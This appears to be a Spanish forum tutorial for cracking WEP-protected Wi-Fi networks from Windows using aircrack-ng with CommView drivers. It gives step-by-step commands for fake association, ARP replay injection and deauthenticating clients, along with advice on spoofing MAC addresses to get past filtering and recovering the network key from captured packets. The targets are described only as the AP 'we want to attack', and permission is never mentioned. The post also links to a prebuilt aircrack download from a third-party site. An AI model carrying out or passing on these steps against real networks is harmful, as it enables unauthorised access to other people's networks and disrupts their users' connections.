Manual Tutorial Aircrack Windows Vista/XP v0.1
________________________________________
Hola a todos, vistas la gran cantidad de preguntas que hay sobre la utilización de aicrack bajo windows, voy a postear un manual que iré completando y retocando. Yo recomiendo utilizar GNU/Linux, una distribución como Backtrack o WifiSlax es una buena elección, si poseeis una tarjeta USB, de momento no hay soporte bajo Windows, esto funciona con tarjetas PCI, PCMCIA o integradas.

El manual lo iré completando poco a poco.


Método 1 - Usando dll y drivers de Commview for Wifi - Windows Vista

Atención
Más de un usuario ha reportado que utilizar los drivers como commview como sus drivers principales pueden crear pantallazos azules que a veces persisten tras un reinicio. Para arreglar esto necesitas arrancar en modo seguro ( pulsando F8 y eligiéndolo al iniciar Windows ) y recuperar los drives anteriores.

Pre requisitos :

1. Descargar Commview for Wi-Fi
http://www.tamos.com/bitrix/redirect.../files/ca6.zip

2. Descargar esta versión de Aircrack con dlls incorporadas

http://www.cursohacker-online.com/de...s/aircrack.zip

Pasos :
• Instalar commview for wifi. No es necesario ejecutarlo.
• Descomprimir el fichero de aircrack que os habéis bajado.
• Instalar los drivers de CommView
• Botón derecho sobre Mi Pc, selecciona propiedades.
• Seleccionar Hardware y después Administrador de Dispositivos.
• Debajo del adaptador de red, botón derecho sobre tu tarjeta y selecciona "Actualizar Driver.."
• Seleccionar instalar desde una lista o ubicación específica. clickar siguiente.
• En este punto siempre es buena idea reiniciar.
Paso general 2. Especificar opciones avanzadas de driver :
• Abre el administrador de dispositivos como en los pasos previos.
• Botón derecho en la tarjeta de red que ahora funciona con los nuevos drivers de commview.
• Selecciona propiedades.
• Abre la pestaña Avanzado
• Especifica MFP a Enable ( activado ).
• Apaga el modo ahorro de energía, power save mode off
• Cambia el Scan Valid Interval de 60 a 30
• Clicka Ok.

Paso 3. Ejecutar airserv-ng.
Abre una consola en modo administrador - botón derecho ejecutar como administrador (Inicio->Accesorios->Simbolo de sistema ).
Accedeis a la carpeta donde tenéis aircrack mediante el comando cd
e.g "cd c:aircrack"
Ejecuta el comando :
Código:
airserv-ng -d "commview.dll|debug" -c 1
donde 1 es el numero de canal, podéis usar el que querais.
pulsa enter.
Seleccionas el adaptador y pulsas 'y' de yes.
Este comando deberá quedarse ejecutándose sin sacar nada por pantalla. Hay que dejarlo en su consola para después abrir otras consolas
y ejecutar los comandos desde alli.
Nota : Puede fallar debido a que no hayas instalado correctamente los drivers de commview.
Si falla al abrir el puerto 666, puede ser porque un firewall lo esté bloqueando.

Abris otra consola en modo administrador.
Y para testear si funciona el modo monitor deberéis introducir este comando ejecutando :
Código:
airodump-ng 127.0.0.1:666
Como véis en lugar de la interfaz de red, especificamos localhost y el puerto en el que escucha airserv.

Información :
BSSID = MAC del AP que queremos atacar
HOST-MAC = MAC de tu tarjeta
Para conseguir tu dirección MAC normalmente ejecutarías ipconfig /all desde una consola de comandos, pero cuando airserv-ng está funcionando, windows no es capaz de conseguir esa información. Debes conseguir la MAC antes de que ejecutes airserv-ng o conseguir la MAC haciendo botón derecho en tu conexión wireless debao de conexiones de red en el panel de control, clicka en propiedades y cuando se abra la página selecciona "configurar" para tu tarjeta, debajo de la pestaña avanzado hay una lista de "direcciones de red" y esa es tu MAC.

ESSID = Nombre de la red

Ahora hay dos escenarios posibles :

1. Que haya una estación asociada
2. Que no haya ninguna estación asociada

En ambos escenarios, podemos empezar asociándonos falsamente con el AP ( suponiendo que tiene autenticación abierta, puede tener WEP y tener autenticación abierta o con clave compartida, pero de momento no nos vamos a preocupar de eso ).

Paso 1) Abrir una nueva consola
Ir al directorio C:Aircrack ( o donde hayamos descomprimido el programa )
Teclea aireplay-ng -1 0 -e ESSID -a BSSID -h HOST-MAC 127.0.0.1:666
Pulsa Enter

Si recibes el mensaje "Association Succesful" va todo bien, la inyección funciona, puedes seguir.
Si recibes un error que involucra a la MAC, puede que el filtrado MAC esté activo. En este caso necesitaremos cambiar nuestra MAC a una que ya esté asociada previamente.
Si recibes gran cantidad de mensajes sobre tipo "Sending Requests", puede que la fuerza de la señal que recibes del AP sea demasiado débil, acércate y mejorala.

En este punto ya sabemos que nuestra tarjeta funciona en modo monitor y es capaz de inyectar.

Escenario 1. Hay clientes en la red y el AP utiliza protección WEP y autenticación abierta. Resumen.

Requisitos : Haber pueso airserv-ng en funcionamiento con los pasos previos y comprobar si tu tarjeta inyecta.

1. Ejecutamos "airodump-ng 127.0.0.1:666" y nos fijamos en el canal y mac del ap que queremos atacar( bssid ).
2. Reejecutamos "airodump-ng --bssid BSSID -c canal 127.0.0.1:666 -w captura" ( Usando el bssid y canal anterior. Esto nos escucha en un canal concreto y para un bssid concreto y lo escribe en el fichero captura)
3. Ejecutamos en otra consola "aireplay-ng -1 0 -e ESSID -a BSSID -h HOST-MAC 127.0.0.1:666" y miramos si nos da un mensaje de successfull.
3. Ejecutamos "aireplay-ng -3 -b BSSID 127.0.0.1:666" ( Este comando esperará una petición ARP y cuando la consiga, veremos subir el campo Data/IVs en airodump-ng y un aviso de que ha recibido ARP). Podéis esperar un rato y quizás lo encuentre por si mismo. Si no para forzarlo seguís en el siguiente paso 4. Si no, saltáis al paso 5.
4. Ejecutamos en otra consola un ataque de deautenticación "aireplay-ng -0 1 -a BSSID 127.0.0.1:666" ( Aquí puede ser necesario que cambieis vuestra mac previamente con macchanger ).
5. Cuando veamos en airodump que tenemos unos cuantos paquetes, ejecutamos en otra consola, sin cerrar airodump-ng, "aircrack-ng captura" y comenzará con el crackeo de la red hasta encontrar la clave. Necesitaremos al menos unos 10-30 mil paquetes de datos, esto es variable, a veces más.. a veces menos.

Agradece